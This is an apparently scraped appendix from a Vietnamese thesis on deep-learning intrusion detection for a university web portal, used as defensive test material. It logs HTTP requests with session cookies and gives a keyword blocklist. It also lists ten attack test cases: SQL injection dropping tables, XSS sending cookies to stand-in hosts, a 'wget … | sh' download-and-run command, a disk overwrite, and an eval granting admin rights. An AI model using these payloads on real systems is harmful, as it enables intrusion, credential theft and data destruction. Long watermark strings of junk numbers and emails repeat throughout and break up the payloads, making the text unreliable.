Đang tải... (xem toàn văn)
ÉTS và DHBK ký ket thoa thuan hop tác nam 2014 ve to chuc seminar, trao doi sinh viên và giang viên, hop tác nghiên cuu, dong huong dan.
\n", "kichHoat": "1", "quocGia": "CA", "loaiDoiTac": [ "21" ] 13 14 15 16 17 18 19 20 21 22 23 } }, "query" :{}, "requestTime" :1645516467817.0 24 25 26 27 28 } { "method": "PUT", "httpVersion": "1.0", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc?t=1645516791500", "cookies": "s:4nRpRSvRk0npNcSf0qDgjaYQLlfRgbZK.RlNiAh2fgLhtawQ OgyGXM+54M7KrNdy8BGQv/80JxZA", "body": { Trang 68 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "maCongTrinh": "20220045", "shcc": "004057", "changes": { "loaiCongTrinh": "BQ", "tenBaiBao": "An assessment of groundwater quality for drinking and agricultural purposes in Ca Mau peninsula, Vietnamese Mekong Delta", "soTacGiaChinh": "1", "soTacGia": "5", "soTacGiaInBk": "2", "tenTacGia": "Quang Khai Ha, Mai Van Le Thi, Phu Le Vo, Hong Quan Nguyen and Abhijit Mukherjee", "sanPhamVuotTroi": "0", "isbn": "1775-1315", "fkMaLoaiTapChi": "07", "fkMaLoaiHoiNghi": "", "diemIf": "", "xepHang": "0", "tenTapChi": "IOP Conference Series: Earth and Environmental Science", "soTapChi": "964", "trangDangBaiBao": "012008", "trangThaiBaiBao": "01", "ngayThangXbTapChi": "1640970000000", "city": "", "quocGia": "", "lvSciText": "", "linkBaiBao": "https://doi.org/10.1088/1755-1315/964/1/012008", "ghiChu": "", "timeStrap": "1645516791489", "ghiChuTapChi": "", "ghiChuHoiNghi": "", "namXuatBanTapChi": "2022" } }, "query": "{}", "requestTime": 1645516790589.0 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 } Trang 69 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập HTTP request dạng DELETE { "method" :"DELETE", "httpVersion" :"1.0", "userAgent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36", "originalUrl" : "/api/doi-ngoai/doi-tac-hoc-thuat?t=1645519882312", "cookies" : "s:jHdEkFdS4H1i4dnZnaQ0lgxpVaqCgcNc.AXbZ8E+xGUaDdX hXjDvVNlSgZgxblNvoS+mVAhKtiv4", "body" :{ "id": "217" }, "query" :{}, "requestTime" :1645519882144.0 10 11 12 } { "method": "DELETE", "httpVersion": "1.0", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc?t=1645764164150", "cookies": "s:txfXfHzIZj9VsqT9-MuhqsO1qDEElzoP.rBVy3qeHjZq91h /HWrwHmBb25WEvxlzj8ofd9aMPkxI", "body": { "maCongTrinh": "20212263", "shcc": "002597" }, "query": {}, "requestTime": 1645764164211.0 10 11 12 13 } Các loại HTTP request bất thường Portal Trang 70 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập { "method" :"GET", "userAgent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl" : "/api/doi-ngoai/ky-ket-thanh-phan-truong/all", "query" :{ "condition": { "kyKetId": "329 Or 1=1; drop tablE DN_ky_ket" } }, "body" :{} 10 11 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/1;select * from LINH_VUC_NGHIEN_CUU where ma like ’%%’/30", "query": { "maCha": " window.open(’http://foiejf.tk?a=${document.cookie}’) ", "adapter": "1" }, "body": {} 10 11 12 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": Trang 71 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "/api/cong-trinh-khoa-hoc/user/page/1/100", "query": { "filter": { "namBd": "", "namKt": "", "loaiCongTrinh": "sessionid=12312312&+username= document.location=’http://hacker+.example.com/cgi-bin/ cookiesteal.cgi?’++document.cookie ", "donVi": "" } }, "body": {} 10 11 12 13 14 15 16 17 } { "method": "GET", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36", "originalUrl": "/api/doi-ngoai/ky-ket-phan-cong/all", "query": { "kyKetId": "eval%28app.model.canBo.update%28% 7B%7D%2C%20%7B%20role%3A%20%27admin%27%20%7D%29%29" }, "body": {} } Các từ khóa khơng phép xuất select * from select* where all_synonyms all_tables all_users system_privilege_map table_privileges table_privilege_map or 1=1 1=1 1%3D1 or 1%3D1 1%3D1 Trang 72 and 1%3D1 and 1=1 drop table drop session insert script Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập <script> <script/> %3cscript%3e 3c%2fscript%3e alert alert( onclick onerror onmouseover eval setinterval function onclick( onerror( onmouseover( eval( setinterval( document.write document.location document.cookie app.model waitfor delay exec cmd rm -rf Danh sách tham số ma trận Đề tài chuyển hóa liệu HTTP request thành ma trận với kích thước [10 × 70] Tham số giá trị cột lần lượt: / / 10 Tham số giá trị hàng lần lượt: Trang 73 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập a b c d e 10 f 11 g 12 h 13 i 14 j 15 k 16 l 17 m 18 n 19 o 20 p 21 q 22 r 23 s 24 t 25 u 26 v 27 w 28 x Trang 74 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập 29 y 30 z 31 32 33 34 35 36 ! 37 " 38 # 39 $ 40 % 41 & 42 ’ 43 ( 44 ) 45 * 46 + 47 , 48 49 50 / 51 : 52 ; 53 < Trang 75 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập 54 = 55 > 56 ? 57 @ 58 [ 59 \ 60 ] 61 ∧ 62 _ 63 64 { 65 | 66 } 67 ∼ 68 69 70 Danh sách testcase bất thường sử dụng để kiểm thử hệ thống thật Testcase 1: Về công dạng XSS { "method": "GET", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/2/100", "query": { "maCha": "%3CSCRipt%3Ewindow.open%28%27http%3A%2 Trang 76 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập F%2Ffoiejf.tk%3Fa%3D%24%7Bdocument.cookie%7D%27% 29%3C%2FscrIPT%3E", "adapter": "2" }, "body": {} 10 11 } Testcase 2: Về công dạng SQL-injection { "method": "GET", "originalUrl": "/api/khcn/linh-vuc-nghien-cuu-khcn/page/1/30", "query": { "maCha": "1$@#; DROP+TABLE FW_CAN_BO;", "adapter": "1%24%40%23%3B%20DROP%2BTABLE%20FW_CAN_BO%3B" }, "body": {} } Testcase 3: Về công dạng XSS 10 11 12 13 14 { "method": "GET", "originalUrl": "/api/cong-trinh-khoa-hoc/user/page/1/100", "query": { "filter": { "namBd": "", "namKt": "4096797311989091sessionid%3D12312312%26 +username%3D%3Cscript%3Edocument.location%3D%27 http%3A%2F%2Fhacker+.example.com%2Fcgi-bin%2F cookiesteal.cgi%3F%27%2B+document.cookie %3C%2Fscript%3E", "loaiCongTrinh": "4096797311989091sessionid%3D12312312%26 +username%3D%3Cscript%3Edocument.location%3D%27 http%3A%2F%2Fhacker+.example.com%2Fcgi-bin%2F cookiesteal.cgi%3F%27%2B+document.cookie Trang 77 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập %3C%2Fscript%3E", "donVi": "" 15 16 } 17 }, "body": {} 18 19 20 } Testcase 4: Về công dạng XSS Function injection { "method": "GET", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc/page/1/50", "query": { "condition": "%%3Cscript%3Eeval%28function%20%28%29%20%7B app.model.canBo.delete%28%7B%7D%29%29%3B%7D %3C%2Fscript%3E%%%%%%%", "isStandard": "true", "filter": { "maDonVi": "", "fromYear": "", "toYear": "Wed Dec 01 2021 00:00:00 GMT+0700", "loaiCt": "" } }, "body": {} 10 11 12 13 14 15 16 17 } Testcase 5: Về công dạng OS-command { "method": "GET", "originalUrl": "/api/khcn/cong-trinh-khoa-hoc/page/1/50", "query": { "condition": "", "isStandard": "true", "filter": { "maDonVi": "", "fromYear": "", Trang 78 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "toYear": "Wed Dec 01 2021 00:00:00 GMT+0700", "loaiCt": "%3C%21 %23exec%20cmd%3D%5C%22wget%20 http%3A%2F%2Fmalicious_source.tk%20-O-%7C sh%22%20 %3E" 10 11 12 13 } 14 }, "body": {} 15 16 17 } Testcase 6: Về công dạng SQL injection { "method": "POST", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "item": { "tieuDe": "Ky ket thoa thuan hop tac voi Cong ty ABC", "diaDiem": ";DRoP table table_privileges", "thoiGian": "seLeCt * FroM TCHC_CAN_BO where first_name LIKE ’%" } } 10 11 12 } Testcase 7: Về công dạng OS-command 10 { "method": "POST", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "item": { "tieuDe": "Ky ket thoa thuan hop tac voi Cong ty ABC", "diaDiem": "%3C%21 %23exec%20cmd%3D%5C%22command %20%3E%2Fdev%2Fsda%22%20 %3E", "thoiGian": "seLeCt * FroM TCHC_CAN_BO where first_name LIKE ’%" Trang 79 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập } 11 } 12 13 } Testcase 8: Về công dạng SQL-injection { "method": "PUT", "originalUrl": "/api/doi-ngoai/ky-ket", "query": {}, "body": { "id": "307", "changes": { "tenDayDu": "{\"vi\":\"Cong ty A\",\"en\":\"A Corporation\"}", "tenVietTat": "A Corp", "namThanhLap": "2002", "phone": "0123456789", "email": "info@acorp.com.vn", "website": "", "capDo": "1", "diaChi": "{\"vi\":\"100 Tran Van A ,P.14, Q.10, TP.HCM\",\"en\":\"\"}", "theManh": "{\"vi\":\"\",\"en\":\"\"}", "moTa": "{\"vi\":\"\",\"en\":\"\"}", "kichHoat": "1", "doiTac": "1", "linhVucKinhDoanh": "", "quocGia": "VN", "ownerEmail": "329 Or 1=1; drop tablE DN_ky_ket", "loaiDoanhNghiep": "empty" } } 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 } Testcase 9: Về công dạng SQL-injection { "method": "PUT", "originalUrl": "/api/carousel", Trang 80 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Hướng tiếp cận học sâu cho hệ thống phát xâm nhập "query": {}, "body": { "id": "329 Or 1=1; drop tablE DN_ky_ket", "changes": { "title": "Anh banner trang chu", "height": "329 Or 1=1; drop tablE DN_ky_ket", "single": "1%24%40%23%3B%20DROP%2BTABLE%20FW_CAN_BO%3B", "active": "1" } } 10 11 12 13 14 } Testcase 10: Về công dạng SQL-injection { "method": "DELETE", "originalUrl": "/api/doi-ngoai/doi-tac-hoc-thuat", "query": {}, "body": { "id": "%2527%253B%20DROP%20TABLE%20all_tables %253BSELECT%20%2A%20FROM%20FW_USER%20 WHERE%20role%20LIKE%20admin%3B" } 10 } Trang 81 Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn C.33.44.55.54.78.65.5.43.22.2.4 22.Tai lieu Luan 66.55.77.99 van Luan an.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.C.33.44.55.54.78.655.43.22.2.4.55.22 Do an.Tai lieu Luan van Luan an Do an.Tai lieu Luan van Luan an Do an Stt.010.Mssv.BKD002ac.email.ninhd 77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77.77.99.44.45.67.22.55.77.C.37.99.44.45.67.22.55.77t@edu.gmail.com.vn.bkc19134.hmu.edu.vn.Stt.010.Mssv.BKD002ac.email.ninhddtt@edu.gmail.com.vn.bkc19134.hmu.edu.vn